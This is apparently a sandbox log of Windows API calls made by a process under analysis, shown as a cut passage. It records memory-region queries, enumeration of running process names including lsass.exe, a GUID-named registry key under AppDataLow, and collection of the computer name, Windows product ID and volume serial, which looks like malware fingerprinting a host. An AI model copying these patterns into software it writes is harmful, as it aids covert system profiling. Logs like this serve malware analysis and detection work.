hProcess=0xffffffffffffffff, lpAddress=0x7ff961570000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff961570000, AllocationBase=0x7ff961570000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.093] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.094] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971910000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971910000, AllocationBase=0x7ff971910000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.094] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.094] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961560000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff961560000, AllocationBase=0x7ff961560000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.094] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.094] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9614d0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9614d0000, AllocationBase=0x7ff9614d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.094] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.095] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961280000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff961280000, AllocationBase=0x7ff961280000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.095] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.095] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9687b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9687b0000, AllocationBase=0x7ff9687b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.095] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.096] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968780000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff968780000, AllocationBase=0x7ff968780000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.096] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.096] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9610c0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9610c0000, AllocationBase=0x7ff9610c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.096] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.097] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c6d0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96c6d0000, AllocationBase=0x7ff96c6d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.097] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.098] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c690000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96c690000, AllocationBase=0x7ff96c690000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.098] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.098] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c700000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96c700000, AllocationBase=0x7ff96c700000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.098] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.098] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f5d0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96f5d0000, AllocationBase=0x7ff96f5d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.098] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.098] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f5b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96f5b0000, AllocationBase=0x7ff96f5b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.098] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.098] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96d320000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96d320000, AllocationBase=0x7ff96d320000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.098] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.099] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c670000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96c670000, AllocationBase=0x7ff96c670000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.099] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.099] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c630000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96c630000, AllocationBase=0x7ff96c630000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.099] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.099] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972800000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff972800000, AllocationBase=0x7ff972800000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.099] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.099] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c5f0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96c5f0000, AllocationBase=0x7ff96c5f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.099] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.099] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c020000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96c020000, AllocationBase=0x7ff96c020000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.100] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.100] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96bfc0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96bfc0000, AllocationBase=0x7ff96bfc0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.100] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.100] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff960c20000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff960c20000, AllocationBase=0x7ff960c20000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.100] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.100] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973180000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973180000, AllocationBase=0x7ff973180000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.100] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.100] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972450000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff972450000, AllocationBase=0x7ff972450000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.100] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.101] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9723b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9723b0000, AllocationBase=0x7ff9723b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.101] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.101] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972370000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff972370000, AllocationBase=0x7ff972370000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.101] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.101] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cde0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96cde0000, AllocationBase=0x7ff96cde0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.101] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.102] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965900000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff965900000, AllocationBase=0x7ff965900000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.102] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.102] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965950000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff965950000, AllocationBase=0x7ff965950000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.102] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.103] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972350000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff972350000, AllocationBase=0x7ff972350000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.103] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.103] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f280000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96f280000, AllocationBase=0x7ff96f280000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.103] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.103] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972240000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff972240000, AllocationBase=0x7ff972240000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.103] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.103] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977820000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977820000, AllocationBase=0x7ff977820000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.103] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.104] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="System", AllocateDestinationString=1) returned 0x0 [0209.104] RtlFreeAnsiString (AnsiString="S") [0209.104] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="smss.exe", AllocateDestinationString=1) returned 0x0 [0209.104] RtlFreeAnsiString (AnsiString="S") [0209.104] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="csrss.exe", AllocateDestinationString=1) returned 0x0 [0209.104] RtlFreeAnsiString (AnsiString="C") [0209.104] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="csrss.exe", AllocateDestinationString=1) returned 0x0 [0209.104] RtlFreeAnsiString (AnsiString="C") [0209.104] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="winlogon.exe", AllocateDestinationString=1) returned 0x0 [0209.104] RtlFreeAnsiString (AnsiString="W") [0209.104] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="wininit.exe", AllocateDestinationString=1) returned 0x0 [0209.104] RtlFreeAnsiString (AnsiString="W") [0209.104] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="services.exe", AllocateDestinationString=1) returned 0x0 [0209.104] RtlFreeAnsiString (AnsiString="S") [0209.104] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="lsass.exe", AllocateDestinationString=1) returned 0x0 [0209.104] RtlFreeAnsiString (AnsiString="L") [0209.104] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.104] RtlFreeAnsiString (AnsiString="S") [0209.104] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="dwm.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="D") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="spoolsv.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="OfficeClickToRun.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="O") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="sihost.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="S") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="taskhostw.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="T") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="explorer.exe", AllocateDestinationString=1) returned 0x0 [0209.105] RtlFreeAnsiString (AnsiString="E") [0209.105] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="RuntimeBroker.exe", AllocateDestinationString=1) returned 0x0 [0209.106] RtlFreeAnsiString (AnsiString="R") [0209.106] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="ShellExperienceHost.exe", AllocateDestinationString=1) returned 0x0 [0209.106] RtlFreeAnsiString (AnsiString="S") [0209.106] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="SearchUI.exe", AllocateDestinationString=1) returned 0x0 [0209.106] RtlFreeAnsiString (AnsiString="S") [0209.106] RtlUpcaseUnicodeString (DestinationString=0x235f560, SourceString="backgroundTaskHost.exe", AllocateDestinationString=1) returned 0x0 [0209.106] RtlFreeAnsiString (AnsiString="B") [0209.106] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0209.106] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegCreateKeyA") returned 0x7ff976fc6dc0 [0209.106] RegCreateKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x235f610 | out: phkResult=0x235f610*=0x1354) returned 0x0 [0209.107] RegQueryValueExA (in: hKey=0x1354, lpValueName="Client", lpReserved=0x0, lpType=0x235f608, lpData=0x74f6ba0, lpcbData=0x235f600*=0x28 | out: lpType=0x235f608*=0x3, lpData=0x74f6ba0*, lpcbData=0x235f600*=0x28) returned 0x0 [0209.107] RegCloseKey (hKey=0x1354) returned 0x0 [0209.107] wsprintfA (in: param_1=0x7aafec0, param_2="%08x%08x%08x%08x" | out: param_1="c5449c7a8bfcc0923b720af430d5cede") returned 32 [0209.107] GetComputerNameA (in: lpBuffer=0x235f4f0, nSize=0x235f600 | out: lpBuffer="LHNIWSJ", nSize=0x235f600) returned 1 [0209.107] lstrlenA (lpString="LHNIWSJ") returned 7 [0209.107] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegOpenKeyExA") returned 0x7ff976f97d70 [0209.107] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x235f4e0 | out: phkResult=0x235f4e0*=0x1354) returned 0x0 [0209.108] RegQueryValueExA (in: hKey=0x1354, lpValueName="ProductID", lpReserved=0x0, lpType=0x0, lpData=0x235f4f0, lpcbData=0x235f600*=0x100 | out: lpType=0x0, lpData=0x235f4f0*=0x30, lpcbData=0x235f600*=0x18) returned 0x0 [0209.108] lstrlenA (lpString="00330-80107-01105-AA992") returned 23 [0209.108] RegQueryValueExA (in: hKey=0x1354, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x235f4f0, lpcbData=0x235f600*=0x100 | out: lpType=0x0, lpData=0x235f4f0*=0x57, lpcbData=0x235f600*=0xf) returned 0x0 [0209.108] lstrlenA (lpString="Windows 10 Pro") returned 14 [0209.108] RegQueryValueExA (in: hKey=0x1354, lpValueName="CurrentVersion", lpReserved=0x0, lpType=0x0, lpData=0x235f4f0, lpcbData=0x235f600*=0x100 | out: lpType=0x0, lpData=0x235f4f0*=0x36, lpcbData=0x235f600*=0x4) returned 0x0 [0209.108] lstrlenA (lpString="6.3") returned 3 [0209.108] RegQueryValueExA (in: hKey=0x1354, lpValueName="InstallDate", lpReserved=0x0, lpType=0x0, lpData=0x235f4e8, lpcbData=0x235f600*=0x4 | out: lpType=0x0, lpData=0x235f4e8*=0x41, lpcbData=0x235f600*=0x4) returned 0x0 [0209.108] RegCloseKey (hKey=0x1354) returned 0x0 [0209.108] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x235f618, lpMaximumComponentLength=0x235f600, lpFileSystemFlags=0x235f610, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x235f618*=0xd2ca4def, lpMaximumComponentLength=0x235f600*=0xff, lpFileSystemFlags=0x235f610*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1 [0209.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74ac5b8, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x235f6d8 | out: lpThreadId=0x235f6d8*=0xb3c) returned 0x1354 [0209.108] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x7ff977b60000 [0209.110] GetProcAddress (hModule=0x7ff977b60000, lpProcName="CreateStreamOnHGlobal") returned 0x7ff9778570a0 [0209.110] CreateStreamOnHGlobal (in: hGlobal=0x0, 